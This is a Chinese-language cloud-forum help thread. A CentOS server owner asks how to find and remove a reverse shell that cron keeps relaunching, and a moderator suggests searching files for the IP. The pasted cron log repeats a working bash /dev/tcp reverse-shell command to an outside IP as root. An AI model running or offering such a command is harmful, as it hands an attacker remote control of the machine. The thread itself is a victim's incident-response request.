阿里云
阿里云飞天战略营全新发布
发表主题 回复主题
  • 178阅读
  • 1回复

[求助]反弹SHELL如何清除

级别: 新人
发帖
1
云币
2
大家好,最近我们的CENTOS服务器中了反弹SHELL。幸好我们有防火墙。反弹SHELL无法兴风作浪。但是我们KILL掉反弹SHELL的进程,他还是会继续起来。而且由于反弹SHELL无法连接远程服务(因为防火墙挡住了),一直在重启连接。 -.vNb!=  
我们查看了计划任务crontab -l .没有发现任何异常。但是在cron的日志里面,就发现了反弹SHELL的启动日志。如下: LoS%  FI  
  1. Apr 10 08:23:01 iZgw82jiymwc5j3yi9fjg3Z CROND[2841]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  2. Apr 10 08:24:01 iZgw82jiymwc5j3yi9fjg3Z CROND[3716]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  3. Apr 10 08:25:01 iZgw82jiymwc5j3yi9fjg3Z CROND[9405]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  4. Apr 10 08:26:01 iZgw82jiymwc5j3yi9fjg3Z CROND[10350]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  5. Apr 10 08:27:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11148]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  6. Apr 10 08:28:01 iZgw82jiymwc5j3yi9fjg3Z CROND[11890]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
  7. Apr 10 08:29:01 iZgw82jiymwc5j3yi9fjg3Z CROND[12568]: (root) CMD (/bin/bash -i >& /dev/tcp/115.28.7.71/29999 0>&1)
但是再去仔细看crontab -l.里面也没有找到这个命令。请问如何能够找到这个日志里面的执行脚本或者执行命令的位置,谢谢 MCfDR#a  
}/.b@`Dh;  
级别: 论坛版主
发帖
12898
云币
29486

只看该作者 沙发  发表于: 04-15
楼主您好, e%EO/ 2"  
*M/ :W =,t  
是否可能在文件系统里搜索某些关键字符(如IP地址),看是否能搜索到包含这些关键字符的文件?
Debian 是一个自由的操作系统 (OS),提供您安装在计算机上使用。操作系统就是能让您的计算机工作的一系列基本程序和实用工具。
发表主题 回复主题
« 返回列表上一主题下一主题

限100 字节
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
 
验证问题: ECS是阿里云提供的什么服务? 正确答案:云服务器
上一个 下一个